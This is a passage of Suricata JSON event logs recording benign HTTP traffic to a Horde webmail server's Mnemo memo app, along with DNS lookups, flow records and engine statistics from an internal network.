{"timestamp":"2020-02-29T00:18:04.703159+0000","flow_id":880338066172632,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52770,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:18:06.824223+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61183,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:06.932681+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33356,"proto":"UDP","dns":{"type":"answer","id":61183,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:06.932681+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33356,"proto":"UDP","dns":{"type":"answer","id":61183,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:18:06.951877+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:18:06.951877+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":15,"tx_id":0}} 
{"timestamp":"2020-02-29T00:18:07.000351+0000","event_type":"stats","stats":{"uptime":14739,"capture":{"kernel_packets":136428,"kernel_drops":0},"decoder":{"pkts":136435,"bytes":93767765,"invalid":192,"ipv4":134904,"ipv6":10,"ethernet":136435,"raw":0,"null":0,"sll":0,"tcp":129487,"udp":5210,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2806,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2822,"synack":2813,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1843,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2384,"failed_udp":112},"tx":{"http":4710,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2464}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2440,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19509,"memcap_state":0,"memcap_global":0},"http":{"memuse":161241,"memcap":0}}} 
{"timestamp":"2020-02-29T00:18:07.317763+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29394,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:07.426181+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34535,"proto":"UDP","dns":{"type":"answer","id":29394,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:07.426181+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34535,"proto":"UDP","dns":{"type":"answer","id":29394,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:07.516716+0000","flow_id":2124693171580563,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34870,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5606}} {"timestamp":"2020-02-29T00:18:08.001099+0000","flow_id":1204526473524166,"event_type":"flow","src_ip":"192.168.10.122","src_port":46995,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:07.308166+0000","end":"2020-02-29T00:13:07.416966+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:18:08.631175+0000","flow_id":2196762722510294,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34868,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7319},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35058,"tx_id":0}} {"timestamp":"2020-02-29T00:18:10.771454+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50796,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":8098,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:10.880127+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50796,"proto":"UDP","dns":{"type":"answer","id":8098,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:10.880127+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50796,"proto":"UDP","dns":{"type":"answer","id":8098,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:10.964330+0000","flow_id":1132834899264066,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34872,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4935}} {"timestamp":"2020-02-29T00:18:11.000525+0000","flow_id":1491443173997920,"event_type":"flow","src_ip":"192.168.10.122","src_port":42597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:10.769376+0000","end":"2020-02-29T00:13:10.877835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.000727+0000","flow_id":1108070098154454,"event_type":"flow","src_ip":"192.168.10.122","src_port":53042,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:10.603094+0000","end":"2020-02-29T00:13:10.711700+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.000795+0000","flow_id":969226690410159,"event_type":"flow","src_ip":"192.168.10.122","src_port":37907,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:10.177839+0000","end":"2020-02-29T00:13:10.286032+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.152034+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37306,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25116,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:18:11.146917+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:18:11.260439+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37306,"proto":"UDP","dns":{"type":"answer","id":25116,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:11.260439+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37306,"proto":"UDP","dns":{"type":"answer","id":25116,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:11.388183+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:18:11.388183+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":208,"tx_id":1}} {"timestamp":"2020-02-29T00:18:11.398435+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61759,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:11.506897+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41542,"proto":"UDP","dns":{"type":"answer","id":61759,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:11.506897+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41542,"proto":"UDP","dns":{"type":"answer","id":61759,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:18:11.621320+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5780}} {"timestamp":"2020-02-29T00:18:12.004506+0000","flow_id":682082356943433,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"159.203.8.72","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:13:11.449097+0000","end":"2020-02-29T00:13:11.561870+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:12.519018+0000","flow_id":2124693171580563,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34870,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5606},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20704,"tx_id":0}} 
{"timestamp":"2020-02-29T00:18:13.000312+0000","flow_id":1019705441143674,"event_type":"flow","src_ip":"192.168.10.122","src_port":44779,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:12.019322+0000","end":"2020-02-29T00:13:12.127791+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:14.000266+0000","event_type":"stats","stats":{"uptime":14746,"capture":{"kernel_packets":136484,"kernel_drops":0},"decoder":{"pkts":136500,"bytes":93793921,"invalid":192,"ipv4":134969,"ipv6":10,"ethernet":136500,"raw":0,"null":0,"sll":0,"tcp":129542,"udp":5220,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2809,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2825,"synack":2816,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1846,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2389,"failed_udp":112},"tx":{"http":4715,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2469}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2445,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checke
d":65536,"rows_skipped":65529,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":140340,"memcap":0}}} {"timestamp":"2020-02-29T00:18:15.965065+0000","flow_id":1132834899264066,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34872,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4935},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":21692,"tx_id":0}} {"timestamp":"2020-02-29T00:18:16.581122+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5780},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":31043,"tx_id":2}} {"timestamp":"2020-02-29T00:18:17.555596+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55199,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15870,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:18:17.664296+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55199,"proto":"UDP","dns":{"type":"answer","id":15870,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:17.664296+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55199,"proto":"UDP","dns":{"type":"answer","id":15870,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:17.680210+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:18:17.680210+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:18:19.000354+0000","flow_id":36278189856155,"event_type":"flow","src_ip":"192.168.10.122","src_port":46056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:18.890267+0000","end":"2020-02-29T00:13:18.998610+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:21.000202+0000","event_type":"stats","stats":{"uptime":14753,"capture":{"kernel_packets":136513,"kernel_drops":0},"decoder":{"pkts":136519,"bytes":93796452,"invalid":192,"ipv4":134988,"ipv6":10,"ethernet":136519,"raw":0,"null":0,"sll":0,"tcp":129559,"udp":5222,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093888},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_t
cp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2390,"failed_udp":112},"tx":{"http":4716,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2470}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2446,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19180,"memcap_state":0,"memcap_global":0},"http":{"memuse":41096,"memcap":0}}} {"timestamp":"2020-02-29T00:18:22.059601+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34874,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:18:22.074132+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46811,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:22.182286+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36137,"proto":"UDP","dns":{"type":"answer","id":46811,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:18:22.182286+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36137,"proto":"UDP","dns":{"type":"answer","id":46811,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:22.245963+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:18:22.245963+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) 